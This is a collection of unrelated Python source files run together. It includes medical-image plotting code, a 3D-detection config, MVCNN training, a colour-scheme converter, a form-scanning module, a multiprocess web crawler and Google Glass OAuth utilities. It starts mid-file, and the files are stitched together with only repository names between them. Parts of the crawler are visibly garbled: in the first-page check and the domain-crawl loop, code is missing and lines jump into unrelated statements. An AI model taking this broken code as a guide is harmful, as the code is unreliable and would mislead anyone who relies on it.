+= 1 print(number) if np.all(mask_img==0): fig, (ax1, ax2, ax3) = plt.subplots( nrows=1, ncols=3 ) ax1.imshow(img_origin, cmap=plt.cm.bone) ax2.imshow(img_origin, cmap=plt.cm.bone) ax2.grid(False) mask_img = ((mask_img / 255.) 
- 1) * (-1) mask_img = np.concatenate([mask_img.reshape(256, 256, 1), np.ones([256, 256, 1]), mask_img.reshape(256, 256, 1)], axis=-1) mask_img = np.array(mask_img, np.float32) ax2.imshow(mask_img, alpha = 0.3) ax3.imshow(img_origin, cmap=plt.cm.bone) ax3.grid(False) ax3.imshow(mask_img, alpha = 0.3) pred_img_3 = ero_and_dil(pred_img) pred_img_3 = ((pred_img_3 / 255.) - 1) * (-1) pred_img_3 = np.concatenate([np.ones([256, 256, 1]),pred_img_3.reshape(256, 256, 1), np.ones([256, 256, 1])], axis=-1) pred_img_3 = np.array(pred_img_3, np.float32) ax3.imshow(pred_img_3, alpha = 0.3) fig.savefig('{}/{}.jpg'.format('./pred_normal_301_combine_1', number)) plt.close(fig) else: fig, (ax1, ax2, ax3) = plt.subplots( nrows=1, ncols=3 ) ax1.imshow(img_origin, cmap=plt.cm.bone) ax2.imshow(img_origin, cmap=plt.cm.bone) ax2.grid(False) mask_img = ((mask_img / 255.) - 1) * (-1) mask_img = np.concatenate([mask_img.reshape(256, 256, 1), np.ones([256, 256, 1]), mask_img.reshape(256, 256, 1)], axis=-1) mask_img = np.array(mask_img, np.float32) ax2.imshow(mask_img, alpha = 0.3) ax3.imshow(img_origin, cmap=plt.cm.bone) ax3.grid(False) ax3.imshow(mask_img, alpha = 0.3) pred_img_3 = ero_and_dil(pred_img) pred_img_3 = ((pred_img_3 / 255.) - 1) * (-1) pred_img_3 = np.concatenate([np.ones([256, 256, 1]),pred_img_3.reshape(256, 256, 1), np.ones([256, 256, 1])], axis=-1) pred_img_3 = np.array(pred_img_3, np.float32) ax3.imshow(pred_img_3, alpha = 0.3) fig.savefig('{}/{}.jpg'.format('./pred_abnormal_301_combine_1', number)) plt.close(fig) xiaobaishu0097/mmdetection3d _base_ = [ '../_base_/datasets/scannet-3d-18class.py', '../_base_/models/votenet.py', '../_base_/default_runtime.py' ] data = dict( samples_per_gpu=2, workers_per_gpu=2 ) model = dict( backbone=dict( _delete_=True, type='Pointformer', num_points=(2048, 1024, 512, 256), radius=(0.2, 0.4, 0.8, 1.2), num_samples=(64, 32, 16, 16), basic_channels=64, fp_channels=((256, 256), (256, 256)), num_heads=8, num_layers=2, ratios=(1, 1, 1, 1), use_decoder=(False, False, False, False), use_lin_enc=False, cloud_points=40000, global_drop=0.2, decoder_drop=0.0, prenorm=True, norm_cfg=dict(type='BN2d')), bbox_head=dict( num_classes=18, bbox_coder=dict( type='PartialBinBasedBBoxCoder', num_sizes=18, num_dir_bins=24, with_rot=False, mean_sizes=[[0.76966727, 0.8116021, 0.92573744], [1.876858, 1.8425595, 1.1931566], [0.61328, 0.6148609, 0.7182701], [1.3955007, 1.5121545, 0.83443564], [0.97949594, 1.0675149, 0.6329687], [0.531663, 0.5955577, 1.7500148], [0.9624706, 0.72462326, 1.1481868], [0.83221924, 1.0490936, 1.6875663], [0.21132214, 0.4206159, 0.5372846], [1.4440073, 1.8970833, 0.26985747], [1.0294262, 1.4040797, 0.87554324], [1.3766412, 0.65521795, 1.6813129], [0.6650819, 0.71111923, 1.298853], [0.41999173, 0.37906948, 1.7513971], [0.59359556, 0.5912492, 0.73919016], [0.50867593, 0.50656086, 0.30136237], [1.1511526, 1.0546296, 0.49706793], [0.47535285, 0.49249494, 0.5802117]] ), # keypoint_contrastive_loss=dict( # type='SupConLoss', # ) ) ) optimizer = dict(type='AdamW', lr=2e-3, weight_decay=1e-1) optimizer_config = dict(grad_clip=dict(max_norm=10, norm_type=2)) lr_config = dict(policy='step', warmup=None, step=[32, 40], gamma=0.3) total_epochs = 48 brain-bzh/SilentCities import os,sys,shutil basepath = sys.argv[1] folderlist = os.listdir(basepath) for folder in folderlist: filelist = os.listdir(os.path.join(basepath,folder)) if len(filelist)==0: print("folder {} is empty, removing".format(folder)) shutil.rmtree(os.path.join(basepath,folder))0 import torch import torch.nn as 
nn import torch.backends.cudnn as cudnn from torch.utils.data import DataLoader from torch.autograd import Variable import torchvision.transforms as transforms import argparse import numpy as np import time import os import matplotlib.pyplot as plt from models.resnet import * from models.mvcnn import * import util from logger import Logger from custom_dataset_our_case import MultiViewDataSet import globals def train_MVCNN(case_description): print("\nTrain MVCNN\n") MVCNN = 'mvcnn' RESNET = 'resnet' MODELS = [RESNET, MVCNN] DATA_PATH = globals.DATA_PATH DEPTH = None MODEL = MODELS[1] EPOCHS = 100 BATCH_SIZE = 10 LR = 0.0001 MOMENTUM = 0.9 LR_DECAY_FREQ = 30 LR_DECAY = 0.1 PRINT_FREQ = 10 RESUME = "" PRETRAINED = True REMOTE = globals.REMOTE case_description = case_description print('Loading data') transform = transforms.Compose([ transforms.CenterCrop(500), transforms.Resize(224), transforms.ToTensor(), ]) device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") # Load dataset dset_train = MultiViewDataSet(DATA_PATH, 'train', transform=transform) train_loader = DataLoader(dset_train, batch_size=BATCH_SIZE, shuffle=True, num_workers=2) ## Got rid of this, not using validation here. # dset_val = MultiViewDataSet(DATA_PATH, 'test', transform=transform) # val_loader = DataLoader(dset_val, batch_size=BATCH_SIZE, shuffle=True, num_workers=2) classes = dset_train.classes print(len(classes), classes) if MODEL == RESNET: if DEPTH == 18: model = resnet18(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 34: model = resnet34(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 50: model = resnet50(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 101: model = resnet101(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 152: model = resnet152(pretrained=PRETRAINED, num_classes=len(classes)) else: raise Exception('Specify number of layers for resnet in command line. --resnet N') print('Using ' + MODEL + str(DEPTH)) else: # number of ModelNet40 needs to match loaded pre-trained model model = mvcnn(pretrained=PRETRAINED, num_classes=40) print('Using ' + MODEL) cudnn.benchmark = True print('Running on ' + str(device)) """ Load pre-trained model and freeze weights for training. This is done by setting param.requires_grad to False """ """Just added this check to load my pretrained model instead of copying it to the repo and having a duplicate""" if REMOTE: PATH = "../../MVCNN_Peter/checkpoint/mvcnn18_checkpoint.pth.tar" else: PATH = "checkpoint/model_from_pete.tar" loaded_model = torch.load(PATH) model.load_state_dict(loaded_model['state_dict']) for param in model.parameters(): param.requires_grad = False num_ftrs = model.classifier[6].in_features model.classifier[6] = nn.Linear(num_ftrs, len(classes)) model.to(device) print(model) logger = Logger('logs') # Loss and Optimizer lr = LR n_epochs = EPOCHS criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=lr) best_acc = 0.0 start_epoch = 0 # Helper functions def load_checkpoint(): global best_acc, start_epoch # Load checkpoint. print('\n==> Loading checkpoint..') assert os.path.isfile(RESUME), 'Error: no checkpoint file found!' 
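# --- Illustrative sketch (added, not part of the original script) ---
# The surrounding code loads a pre-trained network, sets requires_grad = False on
# every parameter, and replaces the final classifier layer so only the new head is
# trained. The same pattern in its minimal form, using a stock torchvision
# ResNet-18 purely as a stand-in backbone (the original loads an MVCNN checkpoint):
import torch.nn as nn
import torchvision.models as models

def build_frozen_classifier(num_classes):
    backbone = models.resnet18(pretrained=True)
    for param in backbone.parameters():
        param.requires_grad = False                      # freeze pre-trained weights
    # only this freshly created head keeps requires_grad=True and gets trained
    backbone.fc = nn.Linear(backbone.fc.in_features, num_classes)
    return backbone

# Only parameters with requires_grad=True need to reach the optimizer, e.g.:
# optimizer = torch.optim.Adam((p for p in model.parameters() if p.requires_grad), lr=1e-4)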
checkpoint = torch.load(RESUME) best_acc = checkpoint['best_acc'] start_epoch = checkpoint['epoch'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) def train(): train_size = len(train_loader) loss = None total = 0 correct = 0 for i, (inputs, targets) in enumerate(train_loader): # Convert from list of 3D to 4D inputs = np.stack(inputs, axis=1) inputs = torch.from_numpy(inputs) inputs, targets = inputs.cuda(device), targets.cuda(device) inputs, targets = Variable(inputs), Variable(targets) # compute output outputs = model(inputs) loss = criterion(outputs, targets) _, predicted = torch.max(outputs.data, 1) total += targets.size(0) correct += (predicted.cpu() == targets.cpu()).sum().item() """ print("total: ", total) print("correct: ", correct) print() """ # compute gradient and do SGD step optimizer.zero_grad() loss.backward() optimizer.step() if (i + 1) % PRINT_FREQ == 0: print("\tIter [%d/%d] Loss: %.4f" % (i + 1, train_size, loss.item())) return loss, int(float(float(correct)/float(total))*100) # Training / Eval loop if RESUME: load_checkpoint() best_acc = 0 best_loss = 0 loss_values = [] acc_values = [] for epoch in range(start_epoch, n_epochs): print('\n-----------------------------------') print('Epoch: [%d/%d]' % (epoch+1, n_epochs)) start = time.time() model.train() (t_loss, t_acc) = train() loss_values.append(t_loss) acc_values.append(t_acc) print("Total loss: " + str(t_loss)) print("Accuracy: " + str(t_acc) + "%") print('Time taken: %.2f sec.' % (time.time() - start)) if t_acc > best_acc: print("UPDATE") print("UPDATE") print("UPDATE") print("UPDATE") print("UPDATE") best_acc = t_acc best_loss = t_loss util.save_checkpoint({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'loss_per_epoch': loss_values, 'acc_per_epoch': acc_values, 'optimizer': optimizer.state_dict(), }, MODEL, DEPTH, case_description) # Decaying Learning Rate if (epoch + 1) % LR_DECAY_FREQ == 0: lr *= LR_DECAY optimizer = torch.optim.Adam(model.parameters(), lr=lr) print('Learning rate:', lr) fig, axs = plt.subplots(2) fig.suptitle('Vertically stacked subplots') axs[0].plot(loss_values, 'r') axs[1].plot(acc_values, 'b') if not REMOTE: plt.show() else: plt.savefig("plots/training.png") renqiukai/cd_api ''' @说明 :草动开放平台基础方法 @时间 :2020/2/13 下午4:28:26 @作者 :任秋锴 @版本 :1.0 ''' import requests from loguru import logger import time class base: def __init__(self, token): self.token = token self.time = str(int(time.time())) def request(self, method="GET", **kwargs): api_address = f"https://api.wowkai.cn/adapter" headers = { "Authorization": f"Bearer {self.token}", } kwargs["headers"] = headers response = requests.request(method=method, url=api_address, **kwargs) # logger.debug(response.json()) if response.status_code == 200: return self.response(response.json()) def response(self, response_json): status_code = response_json.get("status_code") if status_code == 200: return response_json.get("data") else: logger.error(response_json) # -*- coding=utf-8 -*- #!/usr/bin/env python3 import os import plistlib from argparse import ArgumentParser __author__ = 'mgallet' RED = 'Red Component' GREEN = 'Green Component' BLUE = 'Blue Component' BACKGROUND = 'Background Color' CURSOR = 'Cursor Color' FOREGROUND = 'Foreground Color' def iterm2tilda_component(x): return str(int((x * 256)) + int((x * 256)) * 256) def main(): parser = ArgumentParser() parser.add_argument('input', help='.itermcolors filename') parser.add_argument('--input-tilda', default=None, help='Input tilda config file 
(e.g. ~/.config/tilda/config_0)') parser.add_argument('--output-tilda', default=None, help='Output tilda config file (e.g. ~/.config/tilda/config_0)') args = parser.parse_args() palette = [] with open(args.input, 'rb') as fd: content = plistlib.load(fd) new_values = {} for color_index in range(16): key = 'Ansi %d Color' % color_index palette += [iterm2tilda_component(content[key][RED]), iterm2tilda_component(content[key][GREEN]), iterm2tilda_component(content[key][BLUE])] new_values['palette'] = '{%s}' % ', '.join(palette) new_values['cursor_red'] = iterm2tilda_component(content[CURSOR][RED]) new_values['cursor_green'] = iterm2tilda_component(content[CURSOR][GREEN]) new_values['cursor_blue'] = iterm2tilda_component(content[CURSOR][BLUE]) new_values['back_red'] = iterm2tilda_component(content[BACKGROUND][RED]) new_values['back_green'] = iterm2tilda_component(content[BACKGROUND][GREEN]) new_values['back_blue'] = iterm2tilda_component(content[BACKGROUND][BLUE]) new_values['text_red'] = iterm2tilda_component(content[FOREGROUND][RED]) new_values['text_green'] = iterm2tilda_component(content[FOREGROUND][GREEN]) new_values['text_blue'] = iterm2tilda_component(content[FOREGROUND][BLUE]) new_content = '' input_tilda = args.input_tilda if input_tilda: input_tilda = os.path.expanduser(input_tilda) for line in open(input_tilda, 'r', encoding='utf-8'): key, sep, value = line.partition(' = ') if sep == ' = ' and key in new_values: new_content += '%s = %s\n' % (key, new_values[key]) else: new_content += line else: for key in sorted(new_values): new_content += '%s = %s\n' % (key, new_values[key]) output_tilda = args.output_tilda if output_tilda: output_tilda = os.path.expanduser(output_tilda) with open(output_tilda, 'w', encoding='utf-8') as fd: fd.write(new_content) else: print(new_content) if __name__ == '__main__': main() from ScanResult import * from TokenFileWorker import * from AlgorithmScan import * from PIL import Image import profile # Имя файла с изображением бланка. #--------------------------------------------------- SOURCE_IMAGE = "001_2.jpg" #--------------------------------------------------- tokenFileWorker = TokenFileWorker() # возвращает доступный idToken def generateIdToken(): scanResult = ScanResult() scanResult.setStatus( BEFORE_SCAN ) return tokenFileWorker.addScanResult( scanResult ) # начинаем работу алгоритма распознавания. # # image - исходное изображение(формат - PIL). # idToken - , по которому будет идентифицироваться # результат распознавания. def startScanForm( image,\ idToken ): # получаем результат распознавания. scanResult = startScan( image, idToken ) #заносим результат в TokeData( файл с результатами распознавания ). status = scanResult.getStatus() # Если все ок - пишем результат ЦЕЛИКОМ. if ( status == SUCCESS ): tokenFileWorker.setScanResult( scanResult ) else: # В противном случае, правим статус. tokenFileWorker.setScanStatus( idToken, status ) # получаем статус распознавания по маркеру. 
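# --- Illustrative note (added) on the colour conversion used by iterm2tilda_component above ---
# int(x * 256) + int(x * 256) * 256 equals int(x * 256) * 257: an iTerm2 component
# in [0.0, 1.0] is scaled to tilda's 16-bit range by repeating the 8-bit value in
# both bytes. A quick worked check:
assert int(0.5 * 256) + int(0.5 * 256) * 256 == 128 * 257 == 32896
# Note that x = 1.0 yields 256 * 257 = 65792, slightly above the usual 65535
# ceiling; a mapping based on int(x * 255) would top out at exactly 65535.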
def getStatus( idToken ): scanResult = tokenFileWorker.getScanResult( idToken ) return scanResult.getStatus() #ПРИМЕР ИСПОЛЬЗОВАНИЯ #image = Image.open( SOURCE_IMAGE ) #idToken = generateIdToken() #startScanForm( image,\ # idToken ) #profile.run('startScanForm( image,\ # idToken )') #print( getStatus( idToken ) ) 0 import logging import time import re import urllib.parse from queue import Empty from multiprocessing import Process, Event from queue import Queue as Queue from multiprocessing import Queue as MPQueue from threading import Thread from enum import Enum # Used to enable launch as a main import os.path, sys sys.path.insert(0, os.path.abspath('.')) from webmining.html5wrapper import HTML5Wrapper from webmining.seed import Seed, SeedElement from webmining.fetcher import Fetcher, Timeout from webmining.website import Website from webmining.meta_extractor import MetaExtractor, MetaExtractionException from webmining import LIB_PATH __author__ = "" __email__ = "" __status__ = "dev" PAGE_SIZE_LIMIT = 300000 class CrawlMode(Enum): #crawling an entire domain entire = "entire" #crawling a subdomain subpath = "subpath" #crawling a single page single = "single" class Crawler: """ A generic crawler. """ def __init__(self, filename=None, seedlist=None, debug=False, proxy=None, multiproc=True, mode=CrawlMode.entire, max_page_size=PAGE_SIZE_LIMIT): """ :param filename: path to the seed file :param mode: crawling mode, either "entire", "single", "subpath" """ self.seed = None self.debug = debug # init the fetcher with a download limit size self.fetcher = Fetcher(proxy, max_page_size=max_page_size) self.htmltools = HTML5Wrapper() self.crawl_depth = 0 # Do we crawl domains outside the seed self.domain_depth = 0 # At which depth each seed element must be crawled self.page_limit = 0 # Max amount of pages to be crawled self.max_page_size = max_page_size self.website = Website() self.me = MetaExtractor(proxy=proxy) self.badextensions = set(["pdf", "xls", "doc", "ppt", "rtf", "odt", "zip", "tar.gz", "tar", "exe", \ "jpg", "png", "jpeg", "bmp", "gif", "mp3", "flv", "rar", "ogv", "avi", "mp4", \ "mkg", "ps", "ogg", "webm", "ogm", "pps", "pptx", "docx", "xlsx", "mpg", "mov", \ "mkv", "mpeg", "m4v", "iso"]) self.crawling_process_over = False # Logging initialization self.logger = logging.getLogger("webmining:crawler") self.logger.setLevel(logging.INFO) if debug: self.logger.setLevel(logging.DEBUG) self.filename = filename self.seedlist = seedlist self.mode = mode self.authorized_domains = set() def _monitore_processes(self, processes): """ Checks if subcrawling processes are over. This method is meant to be used wrapped into a Thread. """ for p in processes: p["event"].wait() self.crawling_process_over = True def spawn_crawl_processes(self, html2txt, metas, proc, wait_courtesy): processes = [] for i in range(0, proc): e = Event() p = Process(None, self._sub_crawl, None, (), {"queue": self.seed.q, "storage": self.storage, "end_event": e, \ "wait": wait_courtesy, "html2txt": html2txt, "metas": metas}) p.start() processes.append({"proc": p, "event": e, "id": i}) monitor = Thread(group=None, target=self._monitore_processes, name=None, args=(), kwargs={"processes": processes}) monitor.start() while not self.crawling_process_over: # If all processes are over, or if getting an element # from queue takes more than timeout seconds (which seems empirically abnormal) # then crawl is finished. 
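# --- Minimal standalone sketch (added) of the worker/queue/event pattern used by
#     spawn_crawl_processes() above. Everything here (the function names, the
#     "work" of doubling an item) is hypothetical and only illustrates the shape:
#     workers drain a shared input queue, push results to an output queue, and set
#     an Event when the input runs dry; the parent collects until all events are set.
from multiprocessing import Process, Event, Queue as MPQueue
from queue import Empty

def _worker(in_q, out_q, done_evt):
    while True:
        try:
            item = in_q.get(block=True, timeout=1)
        except Empty:
            done_evt.set()               # nothing left to do: signal completion
            return
        out_q.put(item * 2)              # stand-in for the real per-seed crawl

def run_workers(items, n_proc=2):
    in_q, out_q = MPQueue(), MPQueue()
    for it in items:
        in_q.put(it)
    events = [Event() for _ in range(n_proc)]
    procs = [Process(target=_worker, args=(in_q, out_q, evt)) for evt in events]
    for p in procs:
        p.start()
    results = []
    # yield results as they arrive until every worker has signalled completion
    while not all(evt.is_set() for evt in events):
        try:
            results.append(out_q.get(block=True, timeout=1))
        except Empty:
            pass
    # workers are done; drain whatever is still buffered in the queue
    while True:
        try:
            results.append(out_q.get(block=True, timeout=0.5))
        except Empty:
            break
    for p in procs:
        p.join()
    return results

# run_workers() should be called under an `if __name__ == "__main__":` guard on
# platforms that spawn (rather than fork) worker processes.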
c = 0 for p in processes: if not p["proc"].is_alive(): c += 1 if c >= len(processes): self.logger.warning("All processes are dead !") break try: el = self.storage.get(block=True, timeout=5) yield el except Empty: if self.storage.empty(): pass self.logger.debug("joining processes...") for p in processes: if p["proc"].is_alive(): p["proc"].terminate() p["proc"].join() # Finally, joining monitoring thread monitor.join(3) if monitor.is_alive(): monitor._stop() def crawl(self, proc=None, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None): """ :param proc: amount of processes to spawn, 0 or None can be used to exploit the current process :param domain_depth: crawling depth for each seed element (inside original domain) :param crawl_depth: crawling depth for each seed element (outside original domain) :param page_limit: max amount of page to crawl :param wait_courtesy: time in second between each fetch :param html2txt: resulting pages must be raw html (default), or cleant txt :param metas: metas we want to extract during crawling """ self.domain_depth = domain_depth self.crawl_depth = crawl_depth self.page_limit = page_limit # lazy loading, to know if we need to implement seeds with multiproc or not if self.seed is None: if self.filename is not None: self.seed = Seed(f=self.filename, multiproc=not (proc is None or proc == 0)) elif self.seedlist is not None: self.seed = Seed(s=self.seedlist, multiproc=not (proc is None or proc == 0)) if proc is None or proc == 0: self.storage = Queue() # Will contain shared crawl results self._sub_crawl(self.seed.q, self.storage, Event(), wait_courtesy, html2txt, metas, None) while True: try: el = self.storage.get(block=False) yield el except Empty: break else: self.storage = MPQueue() # Will contain shared crawl results yield from self.spawn_crawl_processes(html2txt, metas, proc, wait_courtesy) def _sub_crawl(self, queue, storage, end_event, wait, html2txt, metas, block_timeout=5): """ This private method will be wrapped into a process, and is in charge of dequeuing seed elements, and recording results into the storage. """ while True: se = None pages = [] try: se = queue.get(block=block_timeout is not None, timeout=block_timeout) except Empty: end_event.set() return self.logger.info("Launched crawl [%s]" % se.url) start_url = se.url # Need to keep it as it may change due to redirect pages = self.crawl_domain(se, self.domain_depth, wait, html2txt, self.page_limit, self.mode) self.logger.info("Crawl over with %d pages [%s]" % (len(pages), (se.url if start_url in se.url else '%s -> %s' % (start_url, se.url)))) first = True for url in pages: se = pages[url] ext_metas = {} # Extract asked metas from page if metas is not None: try: ext_metas = self.me.extract(metas, se.html, se.relevant_txt, \ url=url, firstpage=first) first = False except MetaExtractionException as e: self.logger.warning("Impossible to extract metas in [%s]: " % url) self.logger.warning(e) continue for m in ext_metas: if ext_metas[m] is not None: if m not in se.metas.keys(): if m in ["contact", "phone", "fax"]: se.metas[m] = [] else: se.metas[m] = set() if m in ["contact", "phone", "fax"]: se.metas[m].extend(ext_metas[m]) else: se.metas[m].add(ext_metas[m]) storage.put(se) # Let's save memory del pages if self.crawl_depth > 0: # TODO: create new seed elements to put in queue when crawl deeper than 0 # with an updated depth, domain, etc... 
raise Exception("Not implemented") def _check_first_page(self, dom, url): """ Checks if domain first page is - a html redirection - a frameset returns an url to follow, or None if nothing detected. """ # we check out if it contains a metas = dom("meta[http-equiv='refresh'][content], meta[http-equiv='Refresh'][content], meta[http-equiv='REFRESH'][content]") #raise Exception("type of metas : " + str(type(metas)) + "\n" + str(dir(metas))) base_url = self._get_base_url(dom, url) for m in metas.items(): content = m.attr.content m = re.search("url\s?=\s?(.*?)\s", content + ' ', flags=re.I) if m is not None: rurl = m.group(1).strip() rurl = urllib.parse.urljoin(base_url, rurl) self.logger.info("HTTP redirection to [%s]" % rurl) return rurl # We check out if it contains a self.max_page_size: self.logger.warning("Page ignored, too big (%d characters) in %s" % (len(html), seed_el.url)) return None # Is an attachment, so we must ignore it if fresult.attachment is not None: self.logger.warning( "Page ignored, because it correspond to the attachment %s [%s]" % (fresult.attachment, seed_el.url)) return None if len(html) == 0: self.logger.warning("Page ignored because it is empty [%s]" % seed_el.url) return None try: dom = self.htmltools.pq(html) except Exception as e: self.logger.warning("Impossible to parse html url=%s : %s" % (fresult.fetched_url, str(e))) return None # DEACTIVATED FEATURE # Test to see if the root node is a html node # if dom[0].tag.lower() != 'html': # self.logger.warning("Page is not a valid html [%s]" % seed_el.url) # return None return dom @staticmethod def _generate_authorized_domains(domain): domain = domain.lower() # Force lower case auth = set([domain]) if "www." in domain: auth.add(domain.replace("www.", "")) else: auth.add("www." + domain) comdom = {dom.rsplit(".", maxsplit=1)[0] + ".com" for dom in auth if ".com" not in dom} auth.update(comdom) return auth def _is_authorized_subpath(self, init_url, target_url): # Force Lower case init_url = init_url.lower() if init_url is not None else init_url target_url = target_url.lower() if target_url is not None else target_url init_path = urllib.parse.urlparse(init_url).path target_url_parsed = urllib.parse.urlparse(target_url) target_domain, target_path = target_url_parsed.netloc, target_url_parsed.path if target_domain in self.authorized_domains and target_path.startswith(init_path): return True return False def crawl_domain(self, init_seed_el, max_dom_depth, wait, html2txt, limit=None, mode=CrawlMode.entire): """ Fetches a domain, and then crawls its internal pages until given depth. Returns a dictionary of url -> html code. """ pages = {} visited = set() # Already visited URLs found_links = [init_seed_el] # List of found links as SeedElements, waiting to be fetched #overides the limit to crawl only one page if mode == CrawlMode.single: limit = 1 max_dom_depth = 1 self.logger.info("Launching crawl in the %s mode" % mode.value) # -- Managing authorized domains for this crawl -- domain = urllib.parse.urlparse(init_seed_el.url).netloc self.authorized_domains = self._generate_authorized_domains(domain) self.logger.info("Authorized domains for this crawl : %s" % str(self.authorized_domains)) # Looping through found urls while True: if limit is not None and len(visited) > limit: self.logger.info("Max amount of pages reached ! 
(%d)" % limit) return pages self.logger.debug("%d url visited so far" % len(visited)) seed_el = None # Current element being computed, in while loop try: while True: seed_el = found_links.pop(0) if seed_el.url not in visited: break visited.add(seed_el.url) # A popped element is considered visited except IndexError: self.logger.info("No more links to visit for this website.") return pages # Fetching URL given in seed element in param self.logger.debug("Fetching " + seed_el.url) fresult = None retry = 0 max_retry = 2 # TODO - VYS - Make this configurable while fresult is None and retry <= max_retry: try: fresult = self.fetcher.fetch(seed_el.url, self.debug, timeout=10) # If we're here it means that no more retry are needed, disable it retry = max_retry + 1 except Timeout: self.logger.warning("Timeout while fetching %s%s" % ( seed_el.url, (", lets retry (max retry %s)" % max_retry) if retry == 0 else ( " - retry %s/%s" % (retry, max_retry)))) retry += 1 continue if fresult is None: continue if wait > 0: time.sleep(wait) # Lets do a quick check if we don't get a redirect rurl30X = None if fresult.fetched_url != seed_el.url: rurl30X = fresult.fetched_url self.logger.warning("Got a redirect to %s when fetching %s" % (fresult.fetched_url, seed_el.url)) dom = self._verify_and_parse_result(fresult, seed_el) if dom is None: self.logger.warning("Found no DOM for %s" % seed_el.url) continue # normalize root urls to avoid a double visit at http://www.example.com/ and http://www.example.com path = urllib.parse.urlparse(seed_el.url).path if path == '': seed_el.url += '/' self.logger.debug("Fetched [%s] " % seed_el.url) # If this page is the first one for this domain, # we check out if it contains a max_dom_depth: continue if mode != CrawlMode.single: found_links.extend(self._extract_links(dom, init_seed_el, seed_el, visited, mode)) self.logger.debug("Out of while loop.") return pages def _get_base_url(self, dom, url): # check if there is a 'base' tag for link compute base_url = dom('base').attr('href') if base_url is None: base_url = url return base_url def _extract_links(self, dom, init_seed_el, seed_el, visited, mode): """ Given a dom, extract internal links to crawl """ # --- # Link extraction and checking # --- links = {} selected_links = [] added = set() # DOM is sometimes to deep to extract links properly try: links = self.htmltools.extract_doc_links(dom) except Exception as e: links = {} self.logger.warning("Impossible to extract links from %s : %s" % (seed_el.url, str(e))) base_url = self._get_base_url(dom, seed_el.url) for key in links: # We do not want anchors to be crawled key = key.split("#")[0] if len(key) < 1: continue url = None try: url = urllib.parse.urljoin(base_url, key) except Exception as e: # Invalid url, ignoring self.logger.warning("Invalid urljoin (%s,%s): %s" % (base_url, key, str(e))) continue # Trying to get eventual file extension, and to check its validity path = urllib.parse.urlparse(url).path if path == '': url += '/' else: ext = path.split('.')[-1].strip().lower() if ext in self.badextensions: self.logger.debug("Bad extension [%s] in %s" % (ext, url)) continue # Let's check if it's an internal link, and not an outgoing one if urllib.parse.urlparse(url).netloc.lower() in self.authorized_domains and \ url not in visited and url not in added: if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, url): continue se = SeedElement(url, seed_el.groupid) se.depth = seed_el.depth + 1 selected_links.append(se) added.add(url) return selected_links # for 
testing purpose if __name__ == "__main__": logging.basicConfig(level=logging.WARNING, format='[%(levelname)s][%(name)s][%(asctime)s] %(message)s') # def crawl(self, storage, proc=1, domain_depth=0, crawl_depth=0): c = Crawler(LIB_PATH + "resources/testseed.txt") count = 0 # def crawl(self, proc=1, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None): for se in c.crawl(proc=2, domain_depth=2, crawl_depth=0, page_limit=80, wait_courtesy=0.1): # print(se) count += 1 print("%d elements have been crawled !" % count) # Copyright (C) 2013 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for the Quickstart.""" __author__ = ' ()' from urlparse import urlparse import httplib2 from apiclient.discovery import build from oauth2client.appengine import StorageByKeyName from oauth2client.client import AccessTokenRefreshError import sessions from model import Credentials # Load the secret that is used for client side sessions # Create one of these for yourself with, for example: # python -c "import os; print os.urandom(64)" > session.secret SESSION_SECRET = open('session.secret').read() def get_full_url(request_handler, path): """Return the full url from the provided request handler and path.""" pr = urlparse(request_handler.request.url) return '%s://%s%s' % (pr.scheme, pr.netloc, path) def load_session_credentials(request_handler): """Load credentials from the current session.""" session = sessions.LilCookies(request_handler, SESSION_SECRET) userid = session.get_secure_cookie(name='userid') if userid: return userid, StorageByKeyName(Credentials, userid, 'credentials').get() else: return None, None def store_userid(request_handler, userid): """Store current user's ID in session.""" session = sessions.LilCookies(request_handler, SESSION_SECRET) session.set_secure_cookie(name='userid', value=userid) def create_service(service, version, creds=None): """Create a Google API service. Load an API service from a discovery document and authorize it with the provided credentials. Args: service: Service name (e.g 'mirror', 'oauth2'). version: Service version (e.g 'v1'). creds: Credentials used to authorize service. Returns: Authorized Google API service. """ # Instantiate an Http instance http = httplib2.Http() if creds: # Authorize the Http instance with the passed credentials creds.authorize(http) return build(service, version, http=http) def auth_required(handler_method): """A decorator to require that the user has authorized the Glassware.""" def check_auth(self, *args): self.userid, self.credentials = load_session_credentials(self) self.mirror_service = create_service('mirror', 'v1', self.credentials) # TODO: Also check that credentials are still valid. if self.credentials: try: self.credentials.refresh(httplib2.Http()) return handler_method(self, *args) except AccessTokenRefreshError: # Access has been revoked. 
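# --- Illustrative sketch (added) of the decorator pattern implemented by
#     auth_required() above, stripped of the Google/App Engine specifics. The
#     load_credentials / clear_credentials / redirect hooks are hypothetical
#     placeholders, not part of the original Quickstart API:
import functools

def auth_required_sketch(handler_method):
    @functools.wraps(handler_method)
    def check_auth(self, *args):
        self.credentials = self.load_credentials()     # hypothetical hook
        if not self.credentials:
            return self.redirect('/auth')              # hypothetical hook
        try:
            self.credentials.refresh()                 # hypothetical: raises if access was revoked
        except Exception:
            self.clear_credentials()                   # hypothetical hook
            return self.redirect('/auth')
        return handler_method(self, *args)
    return check_auth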
